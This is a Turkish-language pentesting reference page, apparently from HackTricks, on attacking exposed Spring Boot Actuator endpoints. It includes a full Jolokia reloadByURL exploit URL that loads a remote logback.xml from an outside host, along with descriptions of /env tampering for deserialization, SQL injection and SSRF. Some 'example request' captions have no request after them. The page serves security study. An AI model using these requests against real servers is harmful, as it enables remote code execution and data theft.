Spring Actuators
Last updated
Last updated
AWS Hacking öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Kaynak https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Orijinal gönderiyi kontrol edin [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Spring Boot Actuators, /health
, /trace
, /beans
, /env
gibi uç noktaları kaydeder. 1 ile 1.4 sürümleri arasında, bu uç noktalar kimlik doğrulama olmadan erişilebilir. 1.5 sürümünden itibaren, yalnızca /health
ve /info
varsayılan olarak hassas değildir, ancak geliştiriciler genellikle bu güvenliği devre dışı bırakır.
Belirli Actuator uç noktaları hassas verileri açığa çıkarabilir veya zararlı eylemlere izin verebilir:
/dump
, /trace
, /logfile
, /shutdown
, /mappings
, /env
, /actuator/env
, /restart
ve /heapdump
.
Spring Boot 1.x'te, actuator'lar kök URL altında kaydedilirken, 2.x'te /actuator/
temel yolu altındadır.
'/jolokia' Üzerinden Uzaktan Kod Çalıştırma:
/jolokia
actuator uç noktası, MBeans'e HTTP erişimi sağlayan Jolokia Kütüphanesini açığa çıkarır.
reloadByURL
eylemi, dış bir URL'den günlükleme yapılandırmalarını yeniden yüklemek için sömürülebilir; bu, kör XXE veya özel XML yapılandırmaları aracılığıyla Uzaktan Kod Çalıştırma ile sonuçlanabilir.
Örnek sömürü URL'si: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml
.
'/env' Üzerinden Yapılandırma Değişikliği:
Spring Cloud Kütüphaneleri mevcutsa, /env
uç noktası çevresel özelliklerin değiştirilmesine izin verir.
Özellikler, Eureka serviceURL'deki XStream deserialization açığını sömürmek gibi zayıflıkları istismar etmek için manipüle edilebilir.
Örnek sömürü POST isteği:
Diğer Kullanışlı Ayarlar:
spring.datasource.tomcat.validationQuery
, spring.datasource.tomcat.url
ve spring.datasource.tomcat.max-active
gibi özellikler, SQL enjeksiyonu veya veritabanı bağlantı dizelerini değiştirmek gibi çeşitli sömürüler için manipüle edilebilir.
Varsayılan actuator'ların kapsamlı bir listesi burada bulunabilir.
Spring Boot 2.x'teki /env
uç noktası, özellik değişikliği için JSON formatını kullanır, ancak genel kavram aynı kalır.
Env + H2 RCE:
/env
uç noktası ve H2 veritabanının bir arada sömürülmesiyle ilgili detaylar burada bulunabilir.
Yanlış Yol Adı Yorumlaması Üzerinden Spring Boot'ta SSRF:
Spring çerçevesinin HTTP yol adlarındaki matris parametrelerini (;
) ele alması, Sunucu Tarafı İstek Sahteciliği (SSRF) için sömürülebilir.
Örnek sömürü isteği:
AWS Hacking öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)